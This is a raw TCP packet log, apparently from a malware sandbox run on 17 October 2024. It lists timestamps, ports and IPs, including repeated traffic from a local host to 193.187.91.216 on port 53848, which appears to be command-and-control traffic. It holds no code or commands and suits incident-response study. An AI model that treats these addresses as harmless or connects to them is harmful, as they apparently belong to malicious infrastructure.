                                                                                                                                                    Oct 17, 2024 14:18:58.611119986 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.611128092 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.611169100 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.727433920 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.727473021 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.727535009 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.727546930 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.727596045 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.729118109 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.729134083 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.729195118 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.729202032 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.729239941 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.844499111 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.844520092 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.844590902 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.844609976 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.844650984 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.845632076 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.845649004 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.845686913 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.845694065 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.845716000 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.845731974 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.962516069 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.962537050 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.962640047 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.962661982 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.962706089 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.964217901 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.964235067 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.964288950 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:58.964296103 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:58.964334011 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:59.083764076 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:59.083782911 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:59.083830118 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:59.083848953 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:59.083861113 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:59.083887100 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:59.085325003 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:59.085340023 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:59.085386038 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:59.085401058 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:59.085436106 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:59.200516939 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:59.200536013 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:59.200581074 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:59.200601101 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:59.200618982 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:59.200629950 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:59.200658083 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:59.200768948 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:59.200810909 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:59.200825930 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:18:59.200865984 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:59.200928926 CEST49739443192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:18:59.200941086 CEST4434973989.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:05.479909897 CEST6280253848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:05.484776020 CEST5384862802193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:05.484930992 CEST6280253848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:05.488276005 CEST6280253848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:05.493392944 CEST5384862802193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:06.503451109 CEST804973889.44.138.129192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:06.503509998 CEST4973880192.168.2.489.44.138.129
                                                                                                                                                    Oct 17, 2024 14:19:06.683744907 CEST5384862802193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:06.734288931 CEST6280253848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:06.974761009 CEST5384862802193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:06.996452093 CEST6280253848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:07.001333952 CEST5384862802193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:07.001410007 CEST6280253848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:07.007246017 CEST5384862802193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:07.422743082 CEST5384862802193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:07.424082994 CEST6280253848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:07.428988934 CEST5384862802193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:07.712948084 CEST5384862802193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:07.715431929 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:07.720324039 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:07.722719908 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:07.725954056 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:07.727195978 CEST6281880192.168.2.4178.237.33.50
                                                                                                                                                    Oct 17, 2024 14:19:07.731278896 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:07.732259035 CEST8062818178.237.33.50192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:07.732341051 CEST6281880192.168.2.4178.237.33.50
                                                                                                                                                    Oct 17, 2024 14:19:07.732419014 CEST6281880192.168.2.4178.237.33.50
                                                                                                                                                    Oct 17, 2024 14:19:07.737735033 CEST8062818178.237.33.50192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:07.765567064 CEST6280253848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:08.587924004 CEST8062818178.237.33.50192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:08.588027000 CEST6281880192.168.2.4178.237.33.50
                                                                                                                                                    Oct 17, 2024 14:19:08.608485937 CEST6280253848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:08.613543034 CEST5384862802193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:08.905966043 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:08.953036070 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:09.196396112 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.200500965 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:09.205430984 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.205498934 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:09.210321903 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.664021969 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.664045095 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.664056063 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.664094925 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:09.664212942 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.664223909 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.664233923 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.664247990 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:09.664271116 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:09.704372883 CEST8062818178.237.33.50192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.704423904 CEST6281880192.168.2.4178.237.33.50
                                                                                                                                                    Oct 17, 2024 14:19:09.954139948 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.954200029 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.954210997 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.954255104 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:09.954334974 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.954344034 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.954376936 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:09.954761028 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.954811096 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:09.954989910 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.954999924 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.955032110 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:09.955064058 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.955337048 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.955373049 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:09.955419064 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.955430031 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.955466986 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:09.955631018 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:09.999973059 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.244791031 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.244832039 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.244884014 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.244898081 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.244973898 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.245022058 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.245114088 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.245213032 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.245224953 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.245255947 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.245444059 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.245492935 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.245691061 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.245739937 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.245786905 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.246390104 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.246463060 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.246507883 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.246685028 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.246803999 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.246815920 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.246853113 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.247020006 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.247071981 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.548105001 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.548131943 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.548172951 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.548258066 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.548266888 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.548276901 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.548288107 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.548306942 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.548335075 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.548635006 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.548780918 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.548790932 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.548820019 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.548826933 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.548872948 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.549120903 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.549158096 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.549189091 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.549199104 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.549237013 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.549526930 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.549544096 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.549555063 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.549566031 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.549576998 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.549583912 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.549586058 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.549597025 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.549604893 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.549648046 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.550378084 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.550390005 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.550400019 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.550410986 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.550419092 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.550426006 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.550438881 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.550467968 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.652959108 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.653034925 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.653053045 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.653100014 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.653198957 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.653247118 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.653357029 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.653367996 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.653412104 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.653637886 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.653649092 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.653697968 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.653882027 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.654005051 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.654016972 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.654047012 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.654275894 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.654285908 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.654294968 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.654333115 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.654355049 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.654804945 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.654906988 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.654946089 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.757374048 CEST5384862802193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.758665085 CEST6280253848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.763592958 CEST5384862802193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.770698071 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.770801067 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.770817041 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.770848036 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.770992994 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.771037102 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.771202087 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.771219015 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.771256924 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.771414042 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.771600962 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.771612883 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.771656990 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.771718025 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.771759987 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.771785021 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.771795034 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.771804094 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.771831989 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.812434912 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.826729059 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.826848030 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.826858044 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.826888084 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.826972961 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.826982975 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.827023029 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.889209986 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.889231920 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.889255047 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.889283895 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.889372110 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.889411926 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.889455080 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.889472008 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.889524937 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.889663935 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.889832973 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.889847040 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.889868021 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.889955044 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.889992952 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.890142918 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.890157938 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.890196085 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.890379906 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.890396118 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.890429974 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.944407940 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.944470882 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.944482088 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.944519997 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:10.944681883 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:10.944730043 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.006444931 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.006479025 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.006489992 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.006635904 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.006666899 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.006755114 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.006807089 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.006818056 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.006896973 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.007318020 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.007328987 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.007370949 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.007503986 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.007514954 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.007559061 CEST6281753848192.168.2.4193.187.91.216
                                                                                                                                                    Oct 17, 2024 14:19:11.007808924 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.007823944 CEST5384862817193.187.91.216192.168.2.4
                                                                                                                                                    Oct 17, 2024 14:19:11.007838011 CEST5384862817193.187.91.216192.168.2.4
